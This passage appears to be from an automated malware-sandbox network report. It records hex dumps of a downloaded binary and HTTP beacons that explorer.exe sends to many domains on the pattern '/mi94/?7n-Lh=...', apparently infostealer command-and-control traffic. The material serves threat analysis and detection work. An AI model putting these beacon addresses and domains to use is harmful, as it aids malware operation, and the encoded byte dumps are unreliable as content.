46 9f 31 75 00 89 2a 6e da 4d 3a 89 73 ba 21 24 32 ce 30 62 19 8b 73 82 75 73 90 ba 3a 8c 29 4d 21 0e 29 39 87 7b a3 74 6f 72 f3 e3 f0 f3 98 30 11 63 31 76 b1 77 ab 38 f7 36 82 1a 3e ab e6 f0 19 f6 25 d3 14 2d 89 73 fe be d5 a6 e9 29 9b 2c f6 01 7a e9 c9 d5 ec 16 6a f5 6a c7 91 96 3f 07 d5 d9 05 4f 48 8a b0 7c b7 40 07 b8 8f 0f f1 d5 08 90 ac 18 b4 d8 57 7e 0b b4 31 ff 5d f2 8f 94 73 82 a9 45 72 ec 96 44 06 e4 ea 3c 20 20 da 1b 96 a4 4b 1f 8c d8 e3 97 6e 6a 11 9b 88 4e 21 3f b4 57 0e 90 6d 1c 4b 98 af 59 69 cd c3 21 5e a6 a0 9b db 88 3f 9d 4d cc 8a 8a 33 74 2c e2 bb e0 77 3b ba a5 f0 99 c1 e9 7f 7d c0 7f 1c ca e9 8e 1e 33 d1 36 4c 0c 92 47 2c da 89 7b b1 19 9a 80 a7 02 fc 1e 5c e1 65 de d9 5e 53 c4 01 19 ea 25 39 37 20 c7 a0 aa 55 7d 46 46 27 21 85 5c 8b 3f 87 42 e6 44 0c ab 68 92 19 70 fc 5f 9c 2e 8f 60 30
                                                                                            Data Ascii: :VhTm)ao<>u39`:Lb?q%gJC{RZ9_j "VYA?M3t,w;}36B(I,nj#v5E14`tFXYN7f4RO5da7}U.`0mDdK2q Q4LM:yz*v3XB2/O>ytlu@;iV8J%a t0ML#[Y*@x7}JbKD4:Zj7UQ.~\er8~2a~O\>q3n??#}fR5`Opv*;<xuL7I{*GTM#"FMb(tgBiuTR^%p|' js=$7`<TY}Ht_&6XN>Iq,2Dg+,+B 4F<xiJ"|P3Okq4sc|)wdk]^TeK_/]7K!ac2hb4IN$9QKI([y1RWTb=IY2yF1u*nM:s!$20bsus:)M!)9{tor0c1vw86>%-s),zjj?OH|@W~1]sErD< KnjN!?WmKYi!^?M3t,w;}36LG,{\e^S%97 U}FF'!\?BDhp_.`0
                                                                                            Apr 17, 2023 08:57:45.847271919 CEST68INData Raw: af 6d 09 ef 18 b4 60 f6 04 69 5b 8b 30 2d 79 dd 8d 6c 16 85 20 09 e8 06 0c cb 01 c0 a5 50 5a a0 d0 e9 83 8d 14 23 62 6f 59 66 c3 78 1f 50 30 3c 6a 24 8b 2f b6 4f 3e 79 c0 74 6c ff f6 f8 75 40 3b 07 69 06 7d 13 b6 06 24 e7 94 c2 d3 45 2d 99 fe cd
                                                                                            Data Ascii: m`i[0-yl PZ#boYfxP0<j$/O>ytlu@;i}$E- t;LL#0[(@xw}HbKD4:Zk79UQ.~^eO8n2a~O\.q3~??#}fR5`Opv*;<xuL7
                                                                                            Apr 17, 2023 08:57:45.847342968 CEST69INData Raw: f9 65 e7 cd 01 8b 9d 83 8a 11 f3 4b 5f d6 b9 2f b0 c7 a8 b7 ab 5d 37 0c 7f d6 01 ea 4b 21 61 63 18 99 e4 a3 1c c6 9f 32 68 f5 62 a7 e4 8a e4 e4 f8 d0 34 b5 06 aa 1f 06 f6 49 8b 19 4e 24 0b a5 39 51 1c 4b 49 1c 91 a9 87 28 5b d0 bd 82 89 79 8c ce
                                                                                            Data Ascii: eK_/]7K!ac2hb4IN$9QKI([y1RWTb=IY2yF1u*nM:s!$20bsus:)M!)9{tor0c1vw86>%-s),zjj?OH|@W~1]sE
                                                                                            Apr 17, 2023 08:57:45.847429991 CEST71INData Raw: 06 7d 13 b6 06 24 e7 94 c2 d3 45 2d 99 fe cd e2 20 1e 89 03 fc 74 fe f1 3b 4c fc 4c 23 30 03 ef 87 fa 7f e3 5b 04 a9 09 06 0e e3 ea 14 d9 7f 82 b8 a9 28 83 40 78 77 9c 7d f8 d6 b2 bd 48 fe db 03 62 b5 4b 44 34 3a 5a f8 e0 6b 81 e0 99 ac 37 e6 39
                                                                                            Data Ascii: }$E- t;LL#0[(@xw}HbKD4:Zk79UQ.~^eO8n2a~O\.q3~??#}fR5`Opv*;<xuL7I{*GTM#"FMb(tgBiuTR^%p|' js
                                                                                            Apr 17, 2023 08:57:45.847441912 CEST72INData Raw: 1c c4 69 79 41 22 d6 a4 2f 36 d7 61 f2 c9 22 5b 59 c1 7b 8f d9 4e 14 de 4e bb 45 1b 6a be 16 1c 03 1e df e5 02 b9 07 24 6b e0 77 7f 06 78 64 fe ec 02 6f 7a 51 00 2a 0a 9f 9e 72 af 6f d6 67 e9 e0 0e b3 8d f1 94 90 ba 3a da a2 7f a8 7b c5 b2 f5 7f
                                                                                            Data Ascii: iyA"/6a"[Y{NNEj$kwxdozQ*rog:{*{gEr%_B\^9x/+m{O<z?RDl|4}Z7/lNme"wfaChPny*)b^]OL94jv@-b
                                                                                            Apr 17, 2023 08:57:45.847454071 CEST73INData Raw: ce 2c cf c5 a5 6e 92 19 65 27 1c c0 cc 19 c6 53 95 91 54 e9 fb fb 10 17 74 9c d2 f8 86 c7 bd 1a c9 9e 06 62 b2 a1 4c e9 24 b7 2a 8e 4d 77 a0 5f dc b9 4c e6 c4 11 f9 55 b9 9c 6f 34 26 fd 0a 23 99 08 a5 24 6a cd b0 18 0c 9f fd 43 f4 e2 c3 88 f5 6a
                                                                                            Data Ascii: ,ne'STtbL$*Mw_LUo4&#$jCjBPRkKmAKz.JEJDN3tHDytoHxM!$+q>/(81Kld*K5ka:!M=`zepPJlWr`?5jw
                                                                                            Apr 17, 2023 08:57:45.847465992 CEST74INData Raw: 89 7e 65 57 3f 56 71 d6 b2 57 d5 f2 94 40 fe d3 89 90 8d c8 03 10 28 5f b5 65 9e ce 89 e7 45 99 5c 30 b3 fa e7 c1 54 a8 ca 23 82 e2 56 68 d0 76 8c e0 b4 df b2 2e ac 1b d1 09 fe a1 a0 80 47 2b 93 ee 08 95 38 9b 90 39 0b 12 5c 8d b2 b7 75 dc 58 93
                                                                                            Data Ascii: ~eW?VqW@(_eE\0T#Vhv.G+89\uX=*s]Kl=mHV?Ear5:%hs_OK%2ggsubz(nYDBW7q..Z_1Nl;!n3>*J-^@.TW
                                                                                            Apr 17, 2023 08:57:45.847477913 CEST76INData Raw: e5 f9 f5 71 54 3e ee c5 87 bb 2a 42 b0 1a 6b c3 c8 b1 16 5e 50 e0 6a 43 45 7b 60 dc 81 d9 8f 3d fa 1e 38 14 ae de 66 03 33 ed 16 12 38 07 5c 72 35 aa b0 30 76 e2 e4 6e 09 7c c8 a7 17 dd b9 5a cf a0 7b b3 e2 7f f0 e8 bd ab c5 26 3e b2 6e 51 5c 50
                                                                                            Data Ascii: qT>*Bk^PjCE{`=8f38\r50vn|Z{&>nQ\PdX,L9C0&D"TRpwgS?/ 6 _lQHKc!^bP{e8_-k`npKqRW)Hcw,~Raa6t
                                                                                            Apr 17, 2023 08:57:45.847490072 CEST77INData Raw: 48 00 14 e6 c6 f8 2a 1e 4b 06 cf 4d 35 08 4e bf f8 79 5e 37 28 12 8d e8 55 e7 4b 26 f5 b4 87 73 b4 83 a4 0d 70 a2 78 56 31 82 f7 6c 6f bb f9 2b 6b c9 86 e7 5f 9f 6f 5b b4 37 52 a2 46 50 eb e2 e8 64 77 68 af 88 6e 90 8b 1c 94 e3 b4 3c 10 f4 56 0a
                                                                                            Data Ascii: H*KM5Ny^7(UK&spxV1lo+k_o[7RFPdwhn<VFY_FZXsuy'CZE5XMkG$^9\;GkYUrxfl&#r7RbY/$3<q3GIEz
                                                                                            Apr 17, 2023 08:57:45.847501993 CEST78INData Raw: 65 26 30 42 93 0d aa b5 ec 30 30 63 4a 59 60 9a 95 1b 56 d5 5f 2f 03 da 39 b7 37 2f 92 02 c1 cd 30 36 be 5f f6 55 57 81 32 38 0a 0c 1a ba 28 e7 25 4c 21 16 8b c0 c8 b9 28 69 16 f1 e0 8b 70 37 da 6b 38 e0 0b 29 85 51 e1 73 65 f2 bc 4f 1c 89 87 8e
                                                                                            Data Ascii: e&0B00cJY`V_/97/06_UW28(%L!(ip7k8)QseOEw4s=>#"mJ-#y=) 0@@MI9zNoqeSqw3mr6zKD90Dk=c\4x_c0i]iXwOqM SE
                                                                                            Apr 17, 2023 08:57:46.009516954 CEST80INData Raw: 4e aa 43 0c 53 cf 57 65 2f 94 13 d2 b5 a8 32 db a0 b9 59 a0 9b db bb 63 25 49 47 f7 76 00 2d 34 23 44 e8 fe 66 4e 2e ad 69 00 12 6f fc 27 80 1c ca e9 05 62 8b d5 b7 af f3 92 47 2c 51 d5 e3 b5 d8 55 90 66 c9 f4 2d a7 6a 38 32 58 bd ac c4 01 19 61
                                                                                            Data Ascii: NCSWe/2Yc%IGv-4#DfN.io'bG,QUf-j82Xay3hBwp3lP&`eW=#0- c{$'I@$/=}ds(}=ZUv$8jtG~0Foj&"t>|Smy5M


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            1192.168.11.2049856164.155.209.18180C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Apr 17, 2023 08:58:34.965521097 CEST280OUTGET /mi94/?7n-Lh=0CB5zMamgLSa2Qk9G/m2rdJQK8/LiOrSmHcqlOKoi6nqM+OhtDcAk7yr1mTtKwqhUShE&7nrLOp=h2JXJD HTTP/1.1
                                                                                            Host: www.guesstheword.net
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Apr 17, 2023 08:58:35.133346081 CEST280INHTTP/1.1 404 Not Found
                                                                                            Server: nginx
                                                                                            Date: Mon, 17 Apr 2023 06:58:35 GMT
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            10192.168.11.2049871185.53.179.9080C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Apr 17, 2023 09:02:00.981312037 CEST322OUTGET /mi94/?7n-Lh=/g6iPkZMT+AzSmj4EvOYZViGf2+l/NC2EVsOgk6j6s7G3J7D5NbiJXA89lK55coRI4US&7nrLOp=h2JXJD HTTP/1.1
                                                                                            Host: www.hear-aid-92727.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Apr 17, 2023 09:02:01.000396967 CEST322INHTTP/1.1 403 Forbidden
                                                                                            Server: nginx
                                                                                            Date: Mon, 17 Apr 2023 07:02:00 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 146
                                                                                            Connection: close
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            11192.168.11.2049872185.53.179.9180C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Apr 17, 2023 09:02:21.321873903 CEST323OUTGET /mi94/?7n-Lh=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&7nrLOp=h2JXJD HTTP/1.1
                                                                                            Host: www.credit-cards-54889.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Apr 17, 2023 09:02:21.340714931 CEST323INHTTP/1.1 403 Forbidden
                                                                                            Server: nginx
                                                                                            Date: Mon, 17 Apr 2023 07:02:21 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 146
                                                                                            Connection: close
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            12192.168.11.204987334.117.168.23380C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Apr 17, 2023 09:02:41.632143021 CEST325OUTGET /mi94/?7n-Lh=4Tl7mkmR2hfQ9KBizErbd2os7QrtMSS1Xe9D2XLoGouUMWTPUZ0bimWLWeFNR5N6++45&7nrLOp=h2JXJD HTTP/1.1
                                                                                            Host: www.lapalmaaccesible.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Apr 17, 2023 09:02:41.706233025 CEST326INHTTP/1.1 301 Moved Permanently
                                                                                            Date: Mon, 17 Apr 2023 07:02:41 GMT
                                                                                            Content-Length: 0
                                                                                            location: https://www.lapalmaaccesible.com/mi94?7n-Lh=4Tl7mkmR2hfQ9KBizErbd2os7QrtMSS1Xe9D2XLoGouUMWTPUZ0bimWLWeFNR5N6++45&7nrLOp=h2JXJD
                                                                                            strict-transport-security: max-age=3600
                                                                                            x-wix-request-id: 1681714961.64160542154516885
                                                                                            Age: 0
                                                                                            X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMd8D6SPbECzKzxqfsX8Z5Do,qquldgcFrj2n046g4RNSVIrig9SAqnXW0O7zAzsQkQs=,2d58ifebGbosy5xc+FRalquEqHuKc2GHfGewVdvGAMwpw6ITgaJtGSvjgS+1xFgAjoe2GMQJ/MdiMK4Y/vI70wxmG1t0BSord/ffeHjYVYA=,2UNV7KOq4oGjA5+PKsX47AvrMO/f+Z3GvorMN0miK2BYgeUJqUXtid+86vZww+nL,7npGRUZHWOtWoP0Si3wDp6ci80c6horGPFHLDeNWSc0=,xTu8fpDe3EKPsMR1jrheELtnlC8an0YcR8X0qYIY6OA=,ywkbhDzHLtjhjmon1ohv97C9WkIFMHkok2hTXHsCQIv7/z0jSH/7QgM3BvXLnUZ0WIHlCalF7YnfvOr2cMPpyw==
                                                                                            Cache-Control: no-cache
                                                                                            server-timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw3_g
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Server: Pepyaka/1.19.10
                                                                                            Via: 1.1 google
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            13192.168.11.204987534.117.26.5780C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Apr 17, 2023 09:03:02.871603966 CEST333OUTGET /mi94/?7n-Lh=CbCIRV58eRNndOWCI78oxDf6x1iSjx/hnwXmuLCBxTq8dPC8gRCwXJA+IeN3UgdkVb2H&7nrLOp=h2JXJD HTTP/1.1
                                                                                            Host: www.3ay82.xyz
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Apr 17, 2023 09:03:03.182503939 CEST335INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.20.2
                                                                                            Date: Mon, 17 Apr 2023 07:03:03 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 5337
                                                                                            Last-Modified: Thu, 06 Apr 2023 03:09:30 GMT
                                                                                            Vary: Accept-Encoding
                                                                                            ETag: "642e37ea-14d9"
                                                                                            Cache-Control: no-cache
                                                                                            Accept-Ranges: bytes
                                                                                            Via: 1.1 google
                                                                                            Connection: close
                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 77 70 6b 52 65 70 6f 72 74 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 67 6c 6f 62 61 6c 65 72 72 6f 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 26 26 28 77 69 6e 64 6f 77 2e 77 70 6b 3d 6e 65 77 20 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 28 7b 62 69 64 3a 22 62 65 72 67 2d 64 6f 77 6e 6c 6f 61 64 22 2c 72 65 6c 3a 22 32 2e 33 39 2e 31 22 2c 73 61 6d 70 6c 65 52 61 74 65 3a 31 2c 70 6c 75 67 69 6e 73 3a 5b 5b 77 69 6e 64 6f 77 2e 77 70 6b 67 6c 6f 62 61 6c 65 72 72 6f 72 50 6c 75 67 69 6e 2c 7b 6a 73 45 72 72 3a 21 30 2c 6a 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 2c 72 65 73 45 72 72 3a 21 30 2c 72 65 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 7d 5d 2c 5b 77 69 6e 64 6f 77 2e 77 70 6b 70 65 72 66 6f 72 6d 61 6e 63 65 50 6c 75 67 69 6e 2c 7b 65 6e 61 62 6c 65 3a 21 30 2c 73 61 6d 70 6c 65 52 61 74 65 3a 2e 35 7d 5d 5d 7d 29 2c 77 69 6e 64 6f 77 2e 77 70 6b 2e 69 6e 73 74 61 6c 6c 28 29 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 6c 6f 61 64 42 61 69 64 75 48 6d 74 28 74 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e7 99 be e5 ba a6 e7 bb 9f e8 ae a1 22 2c 74 29 3b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 65 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 22 2b 74 3b 76 61 72 20 6f 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e
                                                                                            Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.39.1",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){console.log("",t);var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?"+t;var o=document.getElementsByTagName("script")[0];o.parentNode.insertBefore(e,o)}function
                                                                                            Apr 17, 2023 09:03:03.182580948 CEST336INData Raw: 20 62 61 69 64 75 50 75 73 68 28 74 2c 65 2c 6f 29 7b 77 69 6e 64 6f 77 2e 5f 68 6d 74 2e 70 75 73 68 28 5b 22 5f 74 72 61 63 6b 45 76 65 6e 74 22 2c 74 2c 65 2c 6f 5d 29 7d 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e5 8a a0 e8 bd bd e7 99 be e5 ba
                                                                                            Data Ascii: baiduPush(t,e,o){window._hmt.push(["_trackEvent",t,e,o])}console.log("..."),window._hmt=window._hmt||[];const BUILD_ENV="quark",token="42296466acbd6a1e84224ab1433a06cc";loadBaiduHmt(token)</script><script>function send
                                                                                            Apr 17, 2023 09:03:03.182631969 CEST336INData Raw: 28 69 29 26 26 74 2e 70 75 73 68 28 22 22 2e 63 6f 6e 63 61 74 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 69 29 2c 22 3d 22 29 2e 63 6f 6e 63 61 74 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 5b 69 5d 29 29 29
                                                                                            Data Ascii: (i)&&t.push("".concat(encodeURIComponent(i),"=").concat(encodeURIComponent(a[i])));var c=t.join("&").replace(/%20/g,"+"),s="".concat("https://track.uc.cn/collect","?").concat(c,"&").concat("uc_param_str=dsfrpfvedncpssntnwbipreimeutsv");(o()||r
                                                                                            Apr 17, 2023 09:03:03.201828957 CEST338INData Raw: 22 3d 3d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 75 63 77 65 62 3f
                                                                                            Data Ascii: "===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/apad/i)?"android":window.ucbrowser?"iphone":"unknown"}()&&
                                                                                            Apr 17, 2023 09:03:03.201900959 CEST339INData Raw: 22 2c 22 61 6e 6f 6e 79 6d 6f 75 73 22 29 2c 24 73 63 72 69 70 74 31 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 30 31 2f 77 65 6c 66 61 72 65 61 67 65 6e 63 79
                                                                                            Data Ascii: ","anonymous"),$script1.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorig
                                                                                            Apr 17, 2023 09:03:03.201946020 CEST339INData Raw: 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 2d 61 64 22 3e e6 b2 a1 e6 9c 89 e5 b9 bf e5 91 8a 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 94 b5 e5 bd b1 e6 92 ad e6 94 be e4 b8 8d e5 8d a1 e9 a1 bf 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 b2 be e5 bd a9 e8
                                                                                            Data Ascii: ><div class="no-ad"></div><div></div><div></div></div><script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.a054be17f761b465c0fe.js"></script></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            14192.168.11.2049876198.54.117.21180C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Apr 17, 2023 09:03:23.545691967 CEST340OUTGET /mi94/?7n-Lh=CmkHYlvtWFyiY6x7wzgggV7o1XWqH1EIkW2vDHN+0HbYWyx2WNdLHwPWYAq7GV6cOSXz&7nrLOp=h2JXJD HTTP/1.1
                                                                                            Host: www.crosswalkconsulting.co.uk
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            15192.168.11.2049877205.178.189.12980C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Apr 17, 2023 09:03:44.339966059 CEST342OUTGET /mi94/?7n-Lh=3SBeWh0owYgwrrsY56kh42PLQj3nzVyuSclHSUbMhBspMqLHRI4R/Qbff9b/gx4AUp60&7nrLOp=h2JXJD HTTP/1.1
                                                                                            Host: www.herhustlenation.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Apr 17, 2023 09:03:44.713160038 CEST342OUTGET /mi94/?7n-Lh=3SBeWh0owYgwrrsY56kh42PLQj3nzVyuSclHSUbMhBspMqLHRI4R/Qbff9b/gx4AUp60&7nrLOp=h2JXJD HTTP/1.1
                                                                                            Host: www.herhustlenation.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Apr 17, 2023 09:03:45.088185072 CEST342OUTGET /mi94/?7n-Lh=3SBeWh0owYgwrrsY56kh42PLQj3nzVyuSclHSUbMhBspMqLHRI4R/Qbff9b/gx4AUp60&7nrLOp=h2JXJD HTTP/1.1
                                                                                            Host: www.herhustlenation.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Apr 17, 2023 09:03:45.837871075 CEST342OUTGET /mi94/?7n-Lh=3SBeWh0owYgwrrsY56kh42PLQj3nzVyuSclHSUbMhBspMqLHRI4R/Qbff9b/gx4AUp60&7nrLOp=h2JXJD HTTP/1.1
                                                                                            Host: www.herhustlenation.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Apr 17, 2023 09:03:47.321913958 CEST342OUTGET /mi94/?7n-Lh=3SBeWh0owYgwrrsY56kh42PLQj3nzVyuSclHSUbMhBspMqLHRI4R/Qbff9b/gx4AUp60&7nrLOp=h2JXJD HTTP/1.1
                                                                                            Host: www.herhustlenation.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Apr 17, 2023 09:03:48.805973053 CEST343OUTGET /mi94/?7n-Lh=3SBeWh0owYgwrrsY56kh42PLQj3nzVyuSclHSUbMhBspMqLHRI4R/Qbff9b/gx4AUp60&7nrLOp=h2JXJD HTTP/1.1
                                                                                            Host: www.herhustlenation.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Apr 17, 2023 09:03:50.290021896 CEST343OUTGET /mi94/?7n-Lh=3SBeWh0owYgwrrsY56kh42PLQj3nzVyuSclHSUbMhBspMqLHRI4R/Qbff9b/gx4AUp60&7nrLOp=h2JXJD HTTP/1.1
                                                                                            Host: www.herhustlenation.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
